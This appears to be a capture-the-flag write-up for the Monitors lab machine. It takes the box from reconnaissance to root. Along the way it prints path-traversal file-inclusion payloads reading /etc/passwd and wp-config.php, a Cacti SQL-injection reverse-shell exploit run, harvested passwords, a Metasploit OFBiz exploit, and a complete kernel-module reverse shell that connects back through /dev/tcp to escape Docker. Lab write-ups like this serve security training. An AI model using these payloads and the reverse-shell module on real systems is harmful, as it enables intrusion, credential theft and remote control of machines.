Marcus#

Nmap#

We start by scanning the IP’s ports:

1
┌──(kali㉿kali)-[~]
2
└─$ sudo nmap -sV -sC -A 10.10.10.238
3
PORT   STATE SERVICE VERSION
4
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
5
| ssh-hostkey:
6
|   2048 bacccd81fc9155f3f6a91f4ee8bee52e (RSA)
7
|   256 6943376a1809f5e77a67b81811ead765 (ECDSA)
8
|_  256 5d5e3f67ef7d762315114b53f8413a94 (ED25519)
9
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
10
|_http-generator: WordPress 5.5.1
11
|_http-server-header: Apache/2.4.29 (Ubuntu)
12
|_http-title: Welcome to Monitor &#8211; Taking hardware monitoring seriously
13

14
TRACEROUTE (using port 80/tcp)
15
HOP RTT      ADDRESS
16
1   23.69 ms 10.10.14.1
17
2   25.52 ms monitors.htb (10.10.10.238)

Hosts#

Then we add the domain to /etc/hosts:

1
┌──(root㉿kali)-[/home/kali]
2
└─# echo "10.10.10.238 monitors.htb" >> /etc/hosts

Wordpress#

Nmap showed the site uses WordPress 5.5.1, so we’ll scan this WordPress site with wpscan:

1
┌──(kali㉿kali)-[~]
2
└─$ sudo wpscan --url http://monitors.htb -e ap,t,tt,u --api-token TOKEN
3
[...]
4
[i] Plugin(s) Identified:
5

6
[+] wp-with-spritz
7
 | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
8
 | Latest Version: 1.0 (up to date)
9
 | Last Updated: 2015-08-20T20:15:00.000Z
10
 |
11
 | Found By: Urls In Homepage (Passive Detection)
12
 |
13
 | [!] 1 vulnerability identified:
14
 |
15
 | [!] Title: WP with Spritz 1.0 - Unauthenticated File Inclusion
16
 |     References:
17
 |      - https://wpscan.com/vulnerability/cdd8b32a-b424-4548-a801-bbacbaad23f8
18
 |      - https://www.exploit-db.com/exploits/44544/
19
 |
20
 | Version: 4.2.4 (80% confidence)
21
 | Found By: Readme - Stable Tag (Aggressive Detection)
22
 |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt
23
[...]

Wordpress RFI#

Wpscan tells us the wp-with-spritz plugin version is vulnerable to an RFI:

1
┌──(kali㉿kali)-[~]
2
└─$ locate 44544
3
/usr/share/exploitdb/exploits/php/webapps/44544.php
4

5
┌──(kali㉿kali)-[~]
6
└─$ cat /usr/share/exploitdb/exploits/php/webapps/44544.php
7
# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
8
# Date: 2018-04-25
9
# Exploit Author: Wadeek
10
# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip
11
# Software Version: 1.0
12
# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")
13
# Tested on: Apache2 with PHP 7 on Linux
14
# Category: webapps
15

16

17
1. Version Disclosure
18

19
/wp-content/plugins/wp-with-spritz/readme.txt
20

21
2. Source Code
22

23
if(isset($_GET['url'])){
24
$content=file_get_contents($_GET['url']);
25

26
3. Proof of Concept
27

28
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
29
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

So, let’s check Apache’s configuration:

1
┌──(kali㉿kali)-[~]
2
└─$ curl http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/apache2/sites-enabled/000-default.conf
3
# Default virtual host settings
4
# Add monitors.htb.conf
5
# Add cacti-admin.monitors.htb.conf
6

7
<VirtualHost *:80>
8
[...]

We then find a new domain to add:

1
┌──(root㉿kali)-[/home/kali]
2
└─# echo "10.10.10.238 cacti-admin.monitors.htb" >> /etc/hosts

The monitors.htb config shows the site’s document root is /var/www/wordpress:

1
┌──(kali㉿kali)-[~]
2
└─$ curl http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/apache2/sites-enabled/monitors.htb.conf
3
[...]
4
        ServerAdmin admin@monitors.htb
5
        ServerName monitors.htb
6
        ServerAlias monitors.htb
7
        DocumentRoot /var/www/wordpress
8
[...]

Then the WordPress config file wp-config.php gives us the database password:

1
┌──(kali㉿kali)-[~]
2
└─$ curl http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../var/www/wordpress/wp-config.php
3

4
define( 'DB_NAME', 'wordpress' );
5

6
/** MySQL database username */
7
define( 'DB_USER', 'wpadmin' );
8

9
/** MySQL database password */
10
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

Cacti#

Let’s go to the new site we found: cacti

This site uses cacti 1.2.12. Let’s see if there are known exploits for this version:

1
┌──(kali㉿kali)-[~]
2
└─$ searchsploit cacti 1.2.12
3
------------------------------------------------------------------------------------------------------------------ ---------------------------------
4
 Exploit Title                                                                                                    |  Path
5
------------------------------------------------------------------------------------------------------------------ ---------------------------------
6
Cacti 1.2.12 - 'filter' SQL Injection                                                                             | php/webapps/49810.py
7
------------------------------------------------------------------------------------------------------------------ ---------------------------------
8
Shellcodes: No Results
9
Papers: No Results
10

11
┌──(kali㉿kali)-[~]
12
└─$ locate php/webapps/49810.py
13
/usr/share/exploitdb/exploits/php/webapps/49810.py
14

15
└─$ python3 /usr/share/exploitdb/exploits/php/webapps/49810.py
16
usage: 49810.py [-h] -t <target/host URL> -u <user> -p <password> --lhost <lhost> --lport <lport>
17
49810.py: error: the following arguments are required: -t, -u, -p, --lhost, --lport

We need a password; if we try admin:BestAdministrator@2020! it works. The exploit gets an RCE via an SQLi:

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ python3 /usr/share/exploitdb/exploits/php/webapps/49810.py -t http://cacti-admin.monitors.htb -u admin -p BestAdministrator@2020! --lhost 10.10.14.5 --lport 4444
3
[+] Connecting to the server...
4
[+] Retrieving CSRF token...
5
[+] Got CSRF token: sid:cd05039fb335b6d5cbf9fcecc77db39a5d777669,1694259967
6
[+] Trying to log in...
7
[+] Successfully logged in!
8

9
[+] SQL Injection:
10
"name","hex"
11
"",""
12
"admin","$2y$10$TycpbAes3hYvzsbRxUEbc.dTqT0MdgVipJNBYu8b7rUlmB8zn8JwK"
13
"guest","43e9a4ab75570f5b"
14

15
[+] Check your nc listener!

The reverse shell worked and our netcat shows we’re connected as www-data:

1
┌──(kali㉿kali)-[~]
2
└─$ nc -lvnp 4444
3
listening on [any] 4444 ...
4
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.238] 33632
5
/bin/sh: 0: can't access tty; job control turned off
6
$ id
7
uid=33(www-data) gid=33(www-data) groups=33(www-data)

At this point, I always use this command to upgrade my shell (though here it’s probably unnecessary):

1
$ python3 -c 'import pty; pty.spawn("/bin/sh")'

www-data -> marcus#

Let’s look for references to the user marcus:

1
$ grep 'marcus' /etc -R 2>/dev/null
2
grep 'marcus' /etc -R 2>/dev/null
3
/etc/group-:marcus:x:1000:
4
/etc/subgid:marcus:165536:65536
5
/etc/group:marcus:x:1000:
6
/etc/passwd:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
7
/etc/systemd/system/cacti-backup.service:ExecStart=/home/marcus/.backup/backup.sh
8
/etc/subuid:marcus:165536:65536
9
/etc/passwd-:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
10

11
$ cat /home/marcus/.backup/backup.sh
12
cat /home/marcus/.backup/backup.sh
13
#!/bin/bash
14

15
backup_name="cacti_backup"
16
config_pass="VerticalEdge2020"
17

18
zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
19
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
20
rm /tmp/${backup_name}.zip

We then obtain a new password VerticalEdge2020.

Root#

With this, we connect to Marcus’s SSH:

1
┌──(kali㉿kali)-[~]
2
└─$ ssh marcus@monitors.htb
3
marcus@monitors:~$

We also get the user flag:

1
marcus@monitors:~$ cat user.txt
2
5bb7..443ea

linpeas.sh#

Now we aim to escalate privileges to root. To do so, we’ll use linpeas.sh to enumerate interesting information.

Neither curl nor wget is available, so we won’t use HTTP to send files; we’ll use netcat since it’s available:

1
# Target:
2
$ nc -l -p 1234 > linpeas.sh
3
nc -l -p 1234 > linpeas.sh

1
# Kali:
2
┌──(kali㉿kali)-[~/Desktop/linpeas-server]
3
└─$ nc -w 3 10.10.10.238 1234 < linpeas.sh

We run linpeas:

1
$ chmod +x linpeas.sh
2
chmod +x linpeas.sh
3
$ ./linpeas.sh

Linpeas shows the locally used ports:

1
╔══════════╣ Active Ports
2
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
3
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -
4
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
5
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
6
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
7
tcp6       0      0 :::80                   :::*                    LISTEN      -
8
tcp6       0      0 :::22                   :::*                    LISTEN      -

Tunnel (Chisel)#

The service 127.0.0.1:8443 catches my eye, so we’ll set up a proxy to access the local network:

1
marcus@monitors:~$ nc -l -p 1234 > chisel
2
marcus@monitors:~$ chmod +x chisel
3
marcus@monitors:~$ ./chisel client 10.10.14.5:8000 R:8443:127.0.0.1:1080

1
┌──(kali㉿kali)-[~/Desktop/linpeas-server]
2
└─$ ./chisel server -p 8000 --reverse
3
2023/09/09 17:23:05 server: Reverse tunnelling enabled
4
2023/09/09 17:23:05 server: Fingerprint byl8Mf/Bu9BZsKH8mG4H4E3zwSd50oTi+HL4CEFwWc8=
5
2023/09/09 17:23:05 server: Listening on http://0.0.0.0:8000
6
2023/09/09 17:23:05 server: session#1: tun: proxy#R:8443=>8443: Listening

Chisel then created a tunnel to access https://localhost:8443/ on our own machine: tomcat

1
┌──(kali㉿kali)-[~/Desktop/linpeas-server]
2
└─$ dirsearch -u "https://localhost:8443/"

dirsearch shows that https://localhost:8443/solr/ exists.

With a quick search we find: solr

ofbiz exploit#

We then find that https://localhost:8443/solr/#/ redirects to https://localhost:8443/solr/control/checkLogin/#/: ofbiz This service uses ofbiz 17.12.01.

Searchsploit#

1
┌──(kali㉿kali)-[~]
2
└─$ searchsploit ofbiz
3
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
4
 Exploit Title                                                                                                                            |  Path
5
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
6
Apache OFBiz - Admin Creator                                                                                                              | multiple/remote/12264.txt
7
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities                                                                              | php/webapps/12330.txt
8
Apache OFBiz - Remote Execution (via SQL Execution)                                                                                       | multiple/remote/12263.txt
9
Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities                                                                       | multiple/remote/38230.txt
10
Apache OFBiz 16.11.04 - XML External Entity Injection                                                                                     | java/webapps/45673.py
11
Apache OFBiz 16.11.05 - Cross-Site Scripting                                                                                              | multiple/webapps/45975.txt
12
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)                                                                     | java/webapps/48408.txt
13
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)                                                                                     | java/webapps/50178.sh
14
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
15
Shellcodes: No Results
16
Papers: No Results

Metasploit#

The exploit found with searchsploit doesn’t work. I then look in Metasploit:

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ msfconsole
3
msf6 > search ofbiz
4

5
Matching Modules
6
================
7

8
   #  Name                                                  Disclosure Date  Rank       Check  Description
9
   -  ----                                                  ---------------  ----       -----  -----------
10
   0  exploit/linux/http/apache_ofbiz_deserialization_soap  2021-03-22       excellent  Yes    Apache OFBiz SOAP Java Deserialization
11
   1  exploit/linux/http/apache_ofbiz_deserialization       2020-07-13       excellent  Yes    Apache OFBiz XML-RPC Java Deserialization
12
   2  auxiliary/scanner/http/log4shell_scanner              2021-12-09       normal     No     Log4Shell HTTP Scanner

Let’s use Apache OFBiz XML-RPC Java Deserialization:

1
msf6 > use 1
2
[*] Using configured payload linux/x64/meterpreter_reverse_https

After configuration I have:

1
msf6 exploit(linux/http/apache_ofbiz_deserialization) > show options
2

3
Module options (exploit/linux/http/apache_ofbiz_deserialization):
4

5
   Name       Current Setting  Required  Description
6
   ----       ---------------  --------  -----------
7
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
8
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
9
   RPORT      8443             yes       The target port (TCP)
10
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addres
11
                                         ses.
12
   SRVPORT    8080             yes       The local port to listen on.
13
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
14
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
15
   TARGETURI  /                yes       Base path
16
   URIPATH                     no        The URI to use for this exploit (default is random)
17
   VHOST                       no        HTTP server virtual host
18

19

20
Payload options (linux/x64/meterpreter_reverse_https):
21

22
   Name   Current Setting  Required  Description
23
   ----   ---------------  --------  -----------
24
   LHOST  10.10.14.5       yes       The local listener hostname
25
   LPORT  4444             yes       The local listener port
26
   LURI                    no        The HTTP Path
27

28

29
Exploit target:
30

31
   Id  Name
32
   --  ----
33
   1   Linux Dropper

All that’s left is to run it:

1
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
2
[*] Started HTTPS reverse handler on https://10.10.14.5:4444
3
[*] Running automatic check ("set AutoCheck false" to disable)
4
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Target cannot deserialize arbitrary data. "set ForceExploit true" to override check result.
5
[*] Exploit completed, but no session was created.
6
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set ForceExploit true
7
ForceExploit => true
8
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run

Docker#

At this stage, we see we’re in a docker compose environment:

1
meterpreter > cat /proc/1/cgroup
2
12:pids:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
3
11:cpuset:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
4
10:hugetlb:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
5
9:devices:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
6
8:blkio:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
7
7:cpu,cpuacct:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
8
6:freezer:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
9
5:net_cls,net_prio:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
10
4:perf_event:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
11
3:rdma:/
12
2:memory:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
13
1:name=systemd:/docker/69506ef7a41b39b56262c2f634281cffb6792b0be677ee04c6a3fac480a0983b
14
0::/system.slice/containerd.service

Let’s return to a shell:

1
meterpreter > shell
2
Process 203 created.
3
Channel 4 created.

We discover we are indeed root. The goal now is to get out of the docker compose environment:

1
id
2
uid=0(root) gid=0(root) groups=0(root)

Docker Escape#

Hacktricks suggests looking for capability-related vulnerabilities:

1
capsh --print
2

3
Terminate channel 4? [y/N]  N
4
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
5
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
6
Securebits: 00/0x0/1'b0
7
 secure-noroot: no (unlocked)
8
 secure-no-suid-fixup: no (unlocked)
9
 secure-keep-caps: no (unlocked)
10
uid=0(root)
11
gid=0(root)
12
groups=

We see here that cap_sys_module can be exploited (cf. Hacktricks).

With a bit of research, I found this post: https://blog.nody.cc/posts/container-breakouts-part2/

So we create the two files shown in the post:

1
#include <linux/kmod.h>
2
#include <linux/module.h>
3
MODULE_LICENSE("GPL");
4
MODULE_AUTHOR("AttackDefense");
5
MODULE_DESCRIPTION("LKM reverse shell module");
6
MODULE_VERSION("1.0");
7

8
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.5/4445 0>&1", NULL};
9
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
10

11
// call_usermodehelper function is used to create user mode processes from kernel space
12
static int __init reverse_shell_init(void) {
13
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
14
}
15

16
static void __exit reverse_shell_exit(void) {
17
    printk(KERN_INFO "Exiting\n");
18
}
19

20
module_init(reverse_shell_init);
21
module_exit(reverse_shell_exit);

1
obj-m +=reverse-shell.o
2

3
all:
4
  make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules
5
clean:
6
  make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean

Then we download them onto the target:

1
┌──(kali㉿kali)-[~/Desktop/linpeas-server]
2
└─$ python2 -m SimpleHTTPServer 80
3
Serving HTTP on 0.0.0.0 port 80 ...

1
wget 10.10.14.5/reverse-shell.c
2
--2023-09-09 17:13:13--  http://10.10.14.5/reverse-shell.c
3
Connecting to 10.10.14.5:80... connected.
4
HTTP request sent, awaiting response... 200 OK
5
Length: 616 [text/plain]
6
Saving to: ‘reverse-shell.c’
7

8
     0K                                                       100% 50.2M=0s
9

10
2023-09-09 17:13:13 (50.2 MB/s) - ‘reverse-shell.c’ saved [616/616]

1
wget 10.10.14.5/Makefile
2
connected.
3
HTTP request sent, awaiting response... --2023-09-09 17:13:30--  http://10.10.14.5/Makefile
4
Connecting to 10.10.14.5:80... 200 OK
5
Length: 148 [application/octet-stream]
6
Saving to: ‘Makefile’
7

8
     0K                                                       100% 18.1M=0s
9

10
2023-09-09 17:13:30 (18.1 MB/s) - ‘Makefile’ saved [148/148]

After building the files with make, we run:

1
insmod reverse-shell.ko

Root#

And there we go—we’re out of Docker and we’re root!

1
┌──(kali㉿kali)-[~]
2
└─$ nc -lvnp 4445
3
listening on [any] 4445 ...
4
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.238] 38630
5
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
6
bash: no job control in this shell

We then retrieve the final flag:

1
root@monitors:/# cat /root/root.txt
2
cat /root/root.txt
3
db03..9500